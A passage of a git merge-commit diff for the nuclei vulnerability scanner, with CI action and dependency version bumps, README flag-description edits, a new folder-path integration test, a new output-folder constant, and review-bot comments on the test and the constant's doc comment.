Merge branch 'dev' of github.com:projectdiscovery/nuclei into issue-1797-cleanup-resume-files
commit
2574a225b1
|
@ -13,7 +13,7 @@ jobs:
|
|||
os: [ubuntu-latest, windows-latest, macOS-latest]
|
||||
steps:
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v2
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -10,7 +10,7 @@ jobs:
|
|||
index:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/setup-go@v2
|
||||
- uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ jobs:
|
|||
os: [ubuntu-latest, windows-latest, macOS-latest]
|
||||
steps:
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v2
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -11,7 +11,7 @@ jobs:
|
|||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v2
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
- name: Checkout code
|
||||
|
|
|
@ -18,7 +18,7 @@ jobs:
|
|||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- name: "Set up Go"
|
||||
uses: actions/setup-go@v2
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ jobs:
|
|||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- uses: actions/setup-go@v2
|
||||
- uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -18,7 +18,7 @@ jobs:
|
|||
fetch-depth: 0 # Shallow clones should be disabled for a better relevancy of analysis
|
||||
|
||||
- name: "Set up Go"
|
||||
uses: actions/setup-go@v2
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -7,7 +7,7 @@ jobs:
|
|||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- uses: actions/setup-go@v2
|
||||
- uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
FROM golang:1.18.0-alpine as build-env
|
||||
RUN go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
|
||||
|
||||
FROM alpine:3.15.3
|
||||
FROM alpine:3.15.4
|
||||
RUN apk add --no-cache bind-tools ca-certificates chromium
|
||||
COPY --from=build-env /go/bin/nuclei /usr/local/bin/nuclei
|
||||
ENTRYPOINT ["nuclei"]
|
||||
|
|
38
README.md
38
README.md
|
@ -139,8 +139,8 @@ CONFIGURATIONS:
|
|||
-fr, -follow-redirects enable following redirects for http templates
|
||||
-mr, -max-redirects int max number of redirects to follow for http templates (default 10)
|
||||
-rc, -report-config string nuclei reporting module configuration file
|
||||
-H, -header string[] custom headers in header:value format
|
||||
-V, -var value custom vars in var=value format
|
||||
-H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)
|
||||
-V, -var value custom vars in key=value format
|
||||
-r, -resolvers string file containing resolver list for nuclei
|
||||
-sr, -system-resolvers use system DNS resolving as error fallback
|
||||
-passive enable passive HTTP response processing mode
|
||||
|
@ -184,20 +184,20 @@ HEADLESS:
|
|||
-sc, -system-chrome Use local installed chrome browser instead of nuclei installed
|
||||
|
||||
DEBUG:
|
||||
-debug show all requests and responses
|
||||
-debug-req show all sent requests
|
||||
-debug-resp show all received responses
|
||||
-debug display all requests and responses
|
||||
-dreq, -debug-req display all sent requests
|
||||
-dresp, -debug-resp display all received responses
|
||||
-sresp, -store-resp store all request/response passed through nuclei to output directory
|
||||
-srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default "output")
|
||||
-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)
|
||||
-pi, -proxy-internal proxy all internal requests
|
||||
-tlog, -trace-log string file to write sent requests trace log
|
||||
-elog, -error-log string file to write sent requests error log
|
||||
-version show nuclei version
|
||||
-v, -verbose show verbose output
|
||||
-vv display templates loaded for scan
|
||||
-enable-pprof enable pprof debugging server
|
||||
-tv, -templates-version shows the version of the installed nuclei-templates
|
||||
-pi, -proxy-internal proxy all internal requests
|
||||
-tlog, -trace-log string file to write sent requests trace log
|
||||
-elog, -error-log string file to write sent requests error log
|
||||
-version show nuclei version
|
||||
-v, -verbose show verbose output
|
||||
-vv display templates loaded for scan
|
||||
-ep, -enable-pprof enable pprof debugging server
|
||||
-tv, -templates-version shows the version of the installed nuclei-templates
|
||||
|
||||
UPDATE:
|
||||
-update update nuclei engine to the latest released version
|
||||
|
@ -306,15 +306,17 @@ We have [a discussion thread around this](https://github.com/projectdiscovery/nu
|
|||
|
||||
### Resources
|
||||
|
||||
|
||||
- [Scanning Live Web Applications with Nuclei in CI/CD Pipeline](https://blog.escape.tech/devsecops-part-iii-scanning-live-web-applications/) by [@TristanKalos](https://twitter.com/TristanKalos)
|
||||
- [Finding bugs with Nuclei with PinkDraconian (Robbe Van Roey)](https://www.youtube.com/watch?v=ewP0xVPW-Pk) by **[@PinkDraconian](https://twitter.com/PinkDraconian)**
|
||||
- [Nuclei: Packing a Punch with Vulnerability Scanning](https://bishopfox.com/blog/nuclei-vulnerability-scan) by **Bishopfox**
|
||||
- [The WAF efficacy framework](https://www.fastly.com/blog/the-waf-efficacy-framework-measuring-the-effectiveness-of-your-waf) by **Fastly**
|
||||
- [Scanning Live Web Applications with Nuclei in CI/CD Pipeline](https://blog.escape.tech/devsecops-part-iii-scanning-live-web-applications/) by **[@TristanKalos](https://twitter.com/TristanKalos)**
|
||||
- [Community Powered Scanning with Nuclei](https://blog.projectdiscovery.io/community-powered-scanning-with-nuclei/)
|
||||
- [Nuclei Unleashed - Quickly write complex exploits](https://blog.projectdiscovery.io/nuclei-unleashed-quickly-write-complex-exploits/)
|
||||
- [Nuclei - Fuzz all the things](https://blog.projectdiscovery.io/nuclei-fuzz-all-the-things/)
|
||||
- [Nuclei + Interactsh Integration for Automating OOB Testing](https://blog.projectdiscovery.io/nuclei-interactsh-integration/)
|
||||
- [Weaponizes nuclei Workflows to Pwn All the Things](https://medium.com/@dwisiswant0/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77) by [@dwisiswant0](https://github.com/dwisiswant0)
|
||||
- [How to Scan Continuously with Nuclei?](https://medium.com/@dwisiswant0/how-to-scan-continuously-with-nuclei-fcb7e9d8b8b9) by [@dwisiswant0](https://github.com/dwisiswant0)
|
||||
- [Hack with Automation !!!](https://dhiyaneshgeek.github.io/web/security/2021/07/19/hack-with-automation/) by [@DhiyaneshGeek](https://github.com/DhiyaneshGeek)
|
||||
- [Weaponizes nuclei Workflows to Pwn All the Things](https://medium.com/@dwisiswant0/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77) by **[@dwisiswant0](https://github.com/dwisiswant0)**
|
||||
- [How to Scan Continuously with Nuclei?](https://medium.com/@dwisiswant0/how-to-scan-continuously-with-nuclei-fcb7e9d8b8b9) by **[@dwisiswant0](https://github.com/dwisiswant0)**
|
||||
- [Hack with Automation !!!](https://dhiyaneshgeek.github.io/web/security/2021/07/19/hack-with-automation/) by **[@DhiyaneshGeek](https://github.com/DhiyaneshGeek)**
|
||||
|
||||
### Credits
|
||||
|
||||
|
|
|
@ -2,6 +2,7 @@ package main
|
|||
|
||||
import (
|
||||
"fmt"
|
||||
"strings"
|
||||
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/testutils"
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/utils"
|
||||
|
@ -13,6 +14,8 @@ func getTemplatePath() string {
|
|||
}
|
||||
|
||||
var templatesPathTestCases = map[string]testutils.TestCase{
|
||||
//template folder path issue
|
||||
"http/get.yaml": &folderPathTemplateTest{},
|
||||
//cwd
|
||||
"./dns/cname-fingerprint.yaml": &cwdTemplateTest{},
|
||||
//relative path
|
||||
|
@ -25,15 +28,10 @@ type cwdTemplateTest struct{}
|
|||
|
||||
// Execute executes a test case and returns an error if occurred
|
||||
func (h *cwdTemplateTest) Execute(filePath string) error {
|
||||
var routerErr error
|
||||
|
||||
results, err := testutils.RunNucleiTemplateAndGetResults(filePath, "8x8exch02.8x8.com", debug)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if routerErr != nil {
|
||||
return routerErr
|
||||
}
|
||||
return expectResultsCount(results, 1)
|
||||
}
|
||||
|
||||
|
@ -41,15 +39,10 @@ type relativePathTemplateTest struct{}
|
|||
|
||||
// Execute executes a test case and returns an error if occurred
|
||||
func (h *relativePathTemplateTest) Execute(filePath string) error {
|
||||
var routerErr error
|
||||
|
||||
results, err := testutils.RunNucleiTemplateAndGetResults(filePath, "8x8exch02.8x8.com", debug)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if routerErr != nil {
|
||||
return routerErr
|
||||
}
|
||||
return expectResultsCount(results, 1)
|
||||
}
|
||||
|
||||
|
@ -57,14 +50,23 @@ type absolutePathTemplateTest struct{}
|
|||
|
||||
// Execute executes a test case and returns an error if occurred
|
||||
func (h *absolutePathTemplateTest) Execute(filePath string) error {
|
||||
var routerErr error
|
||||
|
||||
results, err := testutils.RunNucleiTemplateAndGetResults(filePath, "8x8exch02.8x8.com", debug)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if routerErr != nil {
|
||||
return routerErr
|
||||
}
|
||||
return expectResultsCount(results, 1)
|
||||
}
|
||||
|
||||
type folderPathTemplateTest struct{}
|
||||
|
||||
// Execute executes a test case and returns an error if occurred
|
||||
func (h *folderPathTemplateTest) Execute(filePath string) error {
|
||||
results, err := testutils.RunNucleiBinaryAndGetCombinedOutput(debug, []string{"-t", filePath, "-target", "http://example.com"})
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if strings.Contains(results, "installing") {
|
||||
return fmt.Errorf("couldn't find template path,re-installing")
|
||||
}
|
||||
return nil
|
||||
}
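Review bot: The new `folderPathTemplateTest.Execute` passes whenever the combined output lacks the substring "installing", so it would also pass if the binary never loaded or ran `http/get.yaml`, and it would fail on any unrelated log line that contains that word. Consider asserting something positive about the run as well, the way the sibling tests do with `expectResultsCount(results, 1)`, for example by checking that the output names the template. The test also targets `http://example.com`, which presumably makes it dependent on outbound network access in CI; a local test server would be more stable.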
|
||||
|
|
|
@ -192,7 +192,7 @@ on extensive configurability, massive extensibility and ease of use.`)
|
|||
flagSet.BoolVarP(&options.DebugRequests, "debug-req", "dreq", false, "show all sent requests"),
|
||||
flagSet.BoolVarP(&options.DebugResponse, "debug-resp", "dresp", false, "show all received responses"),
|
||||
flagSet.BoolVarP(&options.StoreResponse, "store-resp", "sresp", false, "store all request/response passed through nuclei to output directory"),
|
||||
flagSet.StringVarP(&options.StoreResponseDir, "store-resp-dir", "srd", "output", "store all request/response passed through nuclei to custom directory"),
|
||||
flagSet.StringVarP(&options.StoreResponseDir, "store-resp-dir", "srd", runner.DefaultDumpTrafficOutputFolder, "store all request/response passed through nuclei to custom directory"),
|
||||
flagSet.NormalizedOriginalStringSliceVarP(&options.Proxy, "proxy", "p", []string{}, "list of http/socks5 proxy to use (comma separated or file input)"),
|
||||
flagSet.BoolVarP(&options.ProxyInternal, "proxy-internal", "pi", false, "proxy all internal requests"),
|
||||
flagSet.StringVarP(&options.TraceLogFile, "trace-log", "tlog", "", "file to write sent requests trace log"),
|
||||
|
@ -200,7 +200,7 @@ on extensive configurability, massive extensibility and ease of use.`)
|
|||
flagSet.BoolVar(&options.Version, "version", false, "show nuclei version"),
|
||||
flagSet.BoolVarP(&options.Verbose, "verbose", "v", false, "show verbose output"),
|
||||
flagSet.BoolVar(&options.VerboseVerbose, "vv", false, "display templates loaded for scan"),
|
||||
flagSet.BoolVar(&options.EnablePprof, "enable-pprof", false, "enable pprof debugging server"),
|
||||
flagSet.BoolVarP(&options.EnablePprof, "enable-pprof", "ep", false, "enable pprof debugging server"),
|
||||
flagSet.BoolVarP(&options.TemplatesVersion, "templates-version", "tv", false, "shows the version of the installed nuclei-templates"),
|
||||
)
|
||||
|
||||
|
|
15
v2/go.mod
15
v2/go.mod
|
@ -12,7 +12,7 @@ require (
|
|||
github.com/bluele/gcache v0.0.2
|
||||
github.com/corpix/uarand v0.1.1
|
||||
github.com/go-playground/validator/v10 v10.10.1
|
||||
github.com/go-rod/rod v0.104.4
|
||||
github.com/go-rod/rod v0.105.1
|
||||
github.com/gobwas/ws v1.1.0
|
||||
github.com/google/go-github v17.0.0+incompatible
|
||||
github.com/itchyny/gojq v0.12.7
|
||||
|
@ -38,7 +38,7 @@ require (
|
|||
github.com/projectdiscovery/rawhttp v0.0.8-0.20220321180300-366b511e8bfd
|
||||
github.com/projectdiscovery/retryabledns v1.0.13-0.20211109182249-43d38df59660
|
||||
github.com/projectdiscovery/retryablehttp-go v1.0.2
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20220208075244-7c05502ca8e9
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20220404001522-0d00e0703d0d
|
||||
github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6
|
||||
github.com/remeh/sizedwaitgroup v1.0.0
|
||||
github.com/rs/xid v1.4.0
|
||||
|
@ -50,8 +50,8 @@ require (
|
|||
github.com/tj/go-update v2.2.5-0.20200519121640-62b4b798fd68+incompatible
|
||||
github.com/valyala/fasttemplate v1.2.1
|
||||
github.com/weppos/publicsuffix-go v0.15.1-0.20210928183822-5ee35905bd95
|
||||
github.com/xanzy/go-gitlab v0.61.0
|
||||
github.com/ysmood/gson v0.7.0 // indirect
|
||||
github.com/xanzy/go-gitlab v0.62.0
|
||||
github.com/ysmood/gson v0.7.1 // indirect
|
||||
github.com/ysmood/leakless v0.7.0 // indirect
|
||||
go.uber.org/atomic v1.9.0
|
||||
go.uber.org/multierr v1.8.0
|
||||
|
@ -63,7 +63,7 @@ require (
|
|||
moul.io/http2curl v1.0.0
|
||||
)
|
||||
|
||||
require github.com/aws/aws-sdk-go v1.43.32
|
||||
require github.com/aws/aws-sdk-go v1.43.36
|
||||
|
||||
require github.com/projectdiscovery/folderutil v0.0.0-20211206150108-b4e7ea80f36e
|
||||
|
||||
|
@ -71,12 +71,13 @@ require (
|
|||
github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d
|
||||
github.com/docker/go-units v0.4.0
|
||||
github.com/h2non/filetype v1.1.3
|
||||
github.com/hashicorp/go-version v1.4.0
|
||||
github.com/mholt/archiver v3.1.1+incompatible
|
||||
github.com/openrdap/rdap v0.9.1-0.20191017185644-af93e7ef17b7
|
||||
github.com/projectdiscovery/iputil v0.0.0-20210804143329-3a30fcde43f3
|
||||
github.com/projectdiscovery/nvd v1.0.9-0.20220314070650-d4a214c1f87d
|
||||
github.com/projectdiscovery/sliceutil v0.0.0-20220225084130-8392ac12fa6d
|
||||
github.com/projectdiscovery/wappalyzergo v0.0.35
|
||||
github.com/projectdiscovery/wappalyzergo v0.0.36
|
||||
github.com/stretchr/testify v1.7.1
|
||||
github.com/zmap/zcrypto v0.0.0-20211005224000-2d0ffdec8a9b
|
||||
)
|
||||
|
@ -149,7 +150,7 @@ require (
|
|||
github.com/valyala/bytebufferpool v1.0.0 // indirect
|
||||
github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8 // indirect
|
||||
github.com/yl2chen/cidranger v1.0.2 // indirect
|
||||
github.com/ysmood/goob v0.3.1 // indirect
|
||||
github.com/ysmood/goob v0.4.0 // indirect
|
||||
github.com/yusufpapurcu/wmi v1.2.2 // indirect
|
||||
github.com/zclconf/go-cty v1.10.0 // indirect
|
||||
github.com/zmap/rc2 v0.0.0-20131011165748-24b9757f5521 // indirect
|
||||
|
|
37
v2/go.sum
37
v2/go.sum
|
@ -84,8 +84,8 @@ github.com/armon/consul-api v0.0.0-20180202201655-eb2c6b5be1b6/go.mod h1:grANhF5
|
|||
github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d h1:Byv0BzEl3/e6D5CLfI0j/7hiIEtvGVFPCZ7Ei2oq8iQ=
|
||||
github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw=
|
||||
github.com/aws/aws-sdk-go v1.20.6/go.mod h1:KmX6BPdI08NWTb3/sm4ZGu5ShLoqVDhKgpiN924inxo=
|
||||
github.com/aws/aws-sdk-go v1.43.32 h1:b2NQnfWfImfo7yzXq6gzXEC+6s5v1t2RU3G9o+VirYo=
|
||||
github.com/aws/aws-sdk-go v1.43.32/go.mod h1:y4AeaBuwd2Lk+GepC1E9v0qOiTws0MIWAX4oIKwKHZo=
|
||||
github.com/aws/aws-sdk-go v1.43.36 h1:8a+pYKNT7wSxUy3fi5dSqKQdfmit7SYGg5fv4zf+WuA=
|
||||
github.com/aws/aws-sdk-go v1.43.36/go.mod h1:y4AeaBuwd2Lk+GepC1E9v0qOiTws0MIWAX4oIKwKHZo=
|
||||
github.com/aybabtme/rgbterm v0.0.0-20170906152045-cc83f3b3ce59/go.mod h1:q/89r3U2H7sSsE2t6Kca0lfwTK8JdoNGS/yzM/4iH5I=
|
||||
github.com/benbjohnson/clock v1.1.0 h1:Q92kusRqC1XV2MjkWETPvjJVqKetz1OzxZB7mHJLju8=
|
||||
github.com/benbjohnson/clock v1.1.0/go.mod h1:J11/hYXuz8f4ySSvYwY0FKfm+ezbsZBKZxNJlLklBHA=
|
||||
|
@ -171,8 +171,8 @@ github.com/go-playground/validator/v10 v10.10.1 h1:uA0+amWMiglNZKZ9FJRKUAe9U3RX9
|
|||
github.com/go-playground/validator/v10 v10.10.1/go.mod h1:i+3WkQ1FvaUjjxh1kSvIA4dMGDBiPU55YFDl0WbKdWU=
|
||||
github.com/go-redis/redis v6.15.5+incompatible/go.mod h1:NAIEuMOZ/fxfXJIrKDQDz8wamY7mA7PouImQ2Jvg6kA=
|
||||
github.com/go-rod/rod v0.91.1/go.mod h1:/W4lcZiCALPD603MnJGIvhtywP3R6yRB9EDfFfsHiiI=
|
||||
github.com/go-rod/rod v0.104.4 h1:sQR35AFo9ceR7ksh+Ld81bQzIbrXlQH/IO46iCWqxts=
|
||||
github.com/go-rod/rod v0.104.4/go.mod h1:trmrxxg+qUodIIQiYeyJbW5ZMo0FSajmdEGw2tHzlM4=
|
||||
github.com/go-rod/rod v0.105.1 h1:r0bNmO9siOe13lG6Vbkaak11u48rYmWGl/Hk4MJdOiE=
|
||||
github.com/go-rod/rod v0.105.1/go.mod h1:Wrnn6HokFHskwaIVke3ML1y/NBVp7XPIeB8eDzR9vuw=
|
||||
github.com/goburrow/cache v0.1.4 h1:As4KzO3hgmzPlnaMniZU9+VmoNYseUhuELbxy9mRBfw=
|
||||
github.com/goburrow/cache v0.1.4/go.mod h1:cDFesZDnIlrHoNlMYqqMpCRawuXulgx+y7mXU8HZ+/c=
|
||||
github.com/gobwas/httphead v0.1.0 h1:exrUm0f4YX0L7EBwZHuCF4GDp8aJfVeBrlLQrs6NqWU=
|
||||
|
@ -272,6 +272,8 @@ github.com/hashicorp/go-hclog v0.9.2/go.mod h1:5CU+agLiy3J7N7QjHK5d05KxGsuXiQLrj
|
|||
github.com/hashicorp/go-retryablehttp v0.6.8 h1:92lWxgpa+fF3FozM4B3UZtHZMJX8T5XT+TFdCxsPyWs=
|
||||
github.com/hashicorp/go-retryablehttp v0.6.8/go.mod h1:vAew36LZh98gCBJNLH42IQ1ER/9wtLZZ8meHqQvEYWY=
|
||||
github.com/hashicorp/go-version v1.3.0/go.mod h1:fltr4n8CU8Ke44wwGCBoEymUuxUHl09ZGVZPK5anwXA=
|
||||
github.com/hashicorp/go-version v1.4.0 h1:aAQzgqIrRKRa7w75CKpbBxYsmUoPjzVm1W59ca1L0J4=
|
||||
github.com/hashicorp/go-version v1.4.0/go.mod h1:fltr4n8CU8Ke44wwGCBoEymUuxUHl09ZGVZPK5anwXA=
|
||||
github.com/hashicorp/golang-lru v0.5.0/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
|
||||
github.com/hashicorp/golang-lru v0.5.1/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
|
||||
github.com/hashicorp/hcl v1.0.0/go.mod h1:E5yfLk+7swimpb2L/Alb/PJmXilQ/rhwaUYs4T20WEQ=
|
||||
|
@ -486,10 +488,11 @@ github.com/projectdiscovery/sliceutil v0.0.0-20220225084130-8392ac12fa6d/go.mod
|
|||
github.com/projectdiscovery/stringsutil v0.0.0-20210804142656-fd3c28dbaafe/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20210823090203-2f5f137e8e1d/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20210830151154-f567170afdd9/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20220208075244-7c05502ca8e9 h1:4fvUw6b4sS4GoWbHr60mJo3dI//4mGt3BuLx8Sz9aNw=
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20220208075244-7c05502ca8e9/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
|
||||
github.com/projectdiscovery/wappalyzergo v0.0.35 h1:UDjCmOygrY0Q25ZH4jz5pEw67wPxO6ilHYJQoxgdfu4=
|
||||
github.com/projectdiscovery/wappalyzergo v0.0.35/go.mod h1:vS+npIOANv7eKsEtODsyRQt2n1v8VofCwj2gjmq72EM=
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20220404001522-0d00e0703d0d h1:QYq+NO3fGJyQNvvuciJDUb5LvTZLjRPP5hl7yk/G96A=
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20220404001522-0d00e0703d0d/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
|
||||
github.com/projectdiscovery/wappalyzergo v0.0.36 h1:8wz4ZvOP4FHMOMn7r4BSDPmQGFAbJk6gNx9w3elsv3A=
|
||||
github.com/projectdiscovery/wappalyzergo v0.0.36/go.mod h1:vS+npIOANv7eKsEtODsyRQt2n1v8VofCwj2gjmq72EM=
|
||||
github.com/projectdiscovery/yamldoc-go v1.0.2/go.mod h1:7uSxfMXaBmzvw8m5EhOEjB6nhz0rK/H9sUjq1ciZu24=
|
||||
github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6 h1:DvWRQpw7Ib2CRL3ogYm/BWM+X0UGPfz1n9Ix9YKgFM8=
|
||||
github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6/go.mod h1:8OfZj8p/axkUM/TJoS/O9LDjj/S8u17rxRbqluE9CU4=
|
||||
|
@ -582,28 +585,28 @@ github.com/weppos/publicsuffix-go v0.15.1-0.20210928183822-5ee35905bd95/go.mod h
|
|||
github.com/wsxiaoys/terminal v0.0.0-20160513160801-0940f3fc43a0 h1:3UeQBvD0TFrlVjOeLOBz+CPAI8dnbqNSVwUwRrkp7vQ=
|
||||
github.com/wsxiaoys/terminal v0.0.0-20160513160801-0940f3fc43a0/go.mod h1:IXCdmsXIht47RaVFLEdVnh1t+pgYtTAhQGj73kz+2DM=
|
||||
github.com/xanzy/go-gitlab v0.50.3/go.mod h1:Q+hQhV508bDPoBijv7YjK/Lvlb4PhVhJdKqXVQrUoAE=
|
||||
github.com/xanzy/go-gitlab v0.61.0 h1:sPeRduwe8/8z32nw/5ogQ8f5GP1X096azK4VEq4d5qI=
|
||||
github.com/xanzy/go-gitlab v0.61.0/go.mod h1:F0QEXwmqiBUxCgJm8fE9S+1veX4XC9Z4cfaAbqwk4YM=
|
||||
github.com/xanzy/go-gitlab v0.62.0 h1:D3WuIK1UJ7JPSiYI077PQaU5dcPEshpimCSP07Do1aQ=
|
||||
github.com/xanzy/go-gitlab v0.62.0/go.mod h1:F0QEXwmqiBUxCgJm8fE9S+1veX4XC9Z4cfaAbqwk4YM=
|
||||
github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8 h1:nIPpBwaJSVYIxUFsDv3M8ofmx9yWTog9BfvIu0q41lo=
|
||||
github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8/go.mod h1:HUYIGzjTL3rfEspMxjDjgmT5uz5wzYJKVo23qUhYTos=
|
||||
github.com/xordataexchange/crypt v0.0.3-0.20170626215501-b2862e3d0a77/go.mod h1:aYKd//L2LvnjZzWKhF00oedf4jCCReLcmhLdhm1A27Q=
|
||||
github.com/yl2chen/cidranger v1.0.2 h1:lbOWZVCG1tCRX4u24kuM1Tb4nHqWkDxwLdoS+SevawU=
|
||||
github.com/yl2chen/cidranger v1.0.2/go.mod h1:9U1yz7WPYDwf0vpNWFaeRh0bjwz5RVgRy/9UEQfHl0g=
|
||||
github.com/ysmood/goob v0.3.0/go.mod h1:S3lq113Y91y1UBf1wj1pFOxeahvfKkCk6mTWTWbDdWs=
|
||||
github.com/ysmood/goob v0.3.1 h1:qMp5364BGS1DLJVrAqUxTF6KOFt0YDot8GC70u/0jbI=
|
||||
github.com/ysmood/goob v0.3.1/go.mod h1:S3lq113Y91y1UBf1wj1pFOxeahvfKkCk6mTWTWbDdWs=
|
||||
github.com/ysmood/goob v0.4.0 h1:HsxXhyLBeGzWXnqVKtmT9qM7EuVs/XOgkX7T6r1o1AQ=
|
||||
github.com/ysmood/goob v0.4.0/go.mod h1:u6yx7ZhS4Exf2MwciFr6nIM8knHQIE22lFpWHnfql18=
|
||||
github.com/ysmood/got v0.9.3/go.mod h1:pE1l4LOwOBhQg6A/8IAatkGp7uZjnalzrZolnlhhMgY=
|
||||
github.com/ysmood/got v0.14.1/go.mod h1:pE1l4LOwOBhQg6A/8IAatkGp7uZjnalzrZolnlhhMgY=
|
||||
github.com/ysmood/got v0.19.1 h1:EuONavT9bfly3VunaA+Dt3lBMnQgUFlbUi8dWaz+ddw=
|
||||
github.com/ysmood/got v0.19.1/go.mod h1:pE1l4LOwOBhQg6A/8IAatkGp7uZjnalzrZolnlhhMgY=
|
||||
github.com/ysmood/got v0.23.2 h1:U2U0vyQ/gDaawkKJZK/hyza8UUXbWCurbmazK7AcAfY=
|
||||
github.com/ysmood/got v0.23.2/go.mod h1:pE1l4LOwOBhQg6A/8IAatkGp7uZjnalzrZolnlhhMgY=
|
||||
github.com/ysmood/gotrace v0.2.0/go.mod h1:TzhIG7nHDry5//eYZDYcTzuJLYQIkykJzCRIo4/dzQM=
|
||||
github.com/ysmood/gotrace v0.2.2/go.mod h1:TzhIG7nHDry5//eYZDYcTzuJLYQIkykJzCRIo4/dzQM=
|
||||
github.com/ysmood/gotrace v0.4.0 h1:NkiFGkr8AXxkEosLFudsvw5aGoBY5N7wFPOI4ZSCkb4=
|
||||
github.com/ysmood/gotrace v0.4.0/go.mod h1:TzhIG7nHDry5//eYZDYcTzuJLYQIkykJzCRIo4/dzQM=
|
||||
github.com/ysmood/gotrace v0.6.0 h1:SyI1d4jclswLhg7SWTL6os3L1WOKeNn/ZtzVQF8QmdY=
|
||||
github.com/ysmood/gotrace v0.6.0/go.mod h1:TzhIG7nHDry5//eYZDYcTzuJLYQIkykJzCRIo4/dzQM=
|
||||
github.com/ysmood/gson v0.6.3/go.mod h1:3Kzs5zDl21g5F/BlLTNcuAGAYLKt2lV5G8D1zF3RNmg=
|
||||
github.com/ysmood/gson v0.6.4/go.mod h1:3Kzs5zDl21g5F/BlLTNcuAGAYLKt2lV5G8D1zF3RNmg=
|
||||
github.com/ysmood/gson v0.7.0 h1:oQhY2FQtfy3+bgaNeqopd7NGAB6Me+UpG0n7oO4VDko=
|
||||
github.com/ysmood/gson v0.7.0/go.mod h1:3Kzs5zDl21g5F/BlLTNcuAGAYLKt2lV5G8D1zF3RNmg=
|
||||
github.com/ysmood/gson v0.7.1 h1:zKL2MTGtynxdBdlZjyGsvEOZ7dkxaY5TH6QhAbTgz0Q=
|
||||
github.com/ysmood/gson v0.7.1/go.mod h1:3Kzs5zDl21g5F/BlLTNcuAGAYLKt2lV5G8D1zF3RNmg=
|
||||
github.com/ysmood/leakless v0.6.12/go.mod h1:R8iAXPRaG97QJwqxs74RdwzcRHT1SWCGTNqY8q0JvMQ=
|
||||
github.com/ysmood/leakless v0.7.0 h1:XCGdaPExyoreoQd+H5qgxM3ReNbSPFsEXpSKwbXbwQw=
|
||||
github.com/ysmood/leakless v0.7.0/go.mod h1:R8iAXPRaG97QJwqxs74RdwzcRHT1SWCGTNqY8q0JvMQ=
|
||||
|
|
|
@ -0,0 +1,6 @@
|
|||
package runner
|
||||
|
||||
const (
|
||||
// Default directory used to save protocols traffic
|
||||
DefaultDumpTrafficOutputFolder = "output"
|
||||
)
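Review bot: The doc comment on `DefaultDumpTrafficOutputFolder` does not begin with the identifier, which is the Go convention for exported names and what godoc and the usual linters expect. Suggested wording: `// DefaultDumpTrafficOutputFolder is the default directory used to save protocol traffic.` Because the value is a relative path, the comment could also say what it is resolved against, if the code that writes the dump treats it as relative to the working directory.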
|
|
@ -57,8 +57,8 @@ func ParseOptions(options *types.Options) {
|
|||
